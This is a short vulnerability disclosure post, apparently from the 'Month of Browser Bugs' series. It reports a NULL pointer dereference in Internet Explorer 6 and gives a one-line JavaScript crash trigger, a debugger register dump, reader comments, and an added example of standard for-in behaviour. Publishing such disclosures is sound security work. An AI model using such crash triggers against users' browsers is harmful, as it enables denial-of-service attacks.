MoBB #25: Native Function Iterator
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. A NULL pointer dereference can be triggered by using JavaScript to iterate over a native function with a for-in loop.
for (var i in window.alert) { var a = 1; }
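For comparison, the following is an added example (not part of the original post) showing what a conforming JavaScript engine does with the same for-in construct: a native function exposes no enumerable properties, so the loop completes without running its body, and an absent target (null or undefined) is treated as empty rather than dereferenced. The function names and sample objects are this example's own, chosen for illustration.

```javascript
// Added example: conforming for-in semantics over native functions, user
// functions and ordinary objects. Names (enumerateKeys, handler, etc.) are
// this example's own, not from the advisory.

function enumerateKeys(target) {
  const keys = [];
  // for-in visits enumerable string keys, own keys first, then inherited ones.
  // A null or undefined target yields no iterations instead of an error.
  for (const k in target) {
    keys.push(k);
  }
  return keys;
}

// Native functions carry no enumerable properties, so the loop body never
// runs; an engine must cope with an empty or absent property bag here.
function nativeFunctionKeys() {
  return enumerateKeys(Math.max);
}

// A user-defined function object can have enumerable properties attached.
function userFunctionKeys() {
  function handler() {}
  handler.version = 1;
  return enumerateKeys(handler);
}

// Inherited enumerable keys show up as well; filter them with hasOwnProperty.
function ownKeysOnly(target) {
  return enumerateKeys(target).filter((k) =>
    Object.prototype.hasOwnProperty.call(target, k)
  );
}

function inheritedKeysExample() {
  const base = { fromBase: true };
  const child = Object.create(base);
  child.own = true;
  return { all: enumerateKeys(child), own: ownKeysOnly(child) };
}

console.log(nativeFunctionKeys());      // []
console.log(userFunctionKeys());        // [ 'version' ]
console.log(inheritedKeysExample());    // { all: [ 'own', 'fromBase' ], own: [ 'own' ] }
```

Run it with node; the point is that every one of these targets, including a native function, is a valid for-in subject and the loop simply terminates when there is nothing to enumerate.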
Demonstration
eax=00000000 ebx=ffffffff ecx=0013b3f0
edx=0013b3f0 esi=00000000 edi=0013b488
eip=7dceef12 esp=0013b3d0 ebp=0013b3d4
mshtml!CPtrBagVTableAggregate::CIterator::Start+0x1e:
7dceef12 ff36 push dword ptr [esi] ds:0023:00000000=?????
This bug will be added to the OSVDB:
Microsoft IE Native Function Iteration NULL Dereference
3 Comments:
Very nice find.
Many commands are affected.
I'm still curious what will be at the top of this mountain. Maybe something really, really tricky and amazing? Who knows but The Great HD Moore.
Can we get RSS feeds from this site?
IE7 - Beta3 is not affected
Version 7.0.5450.4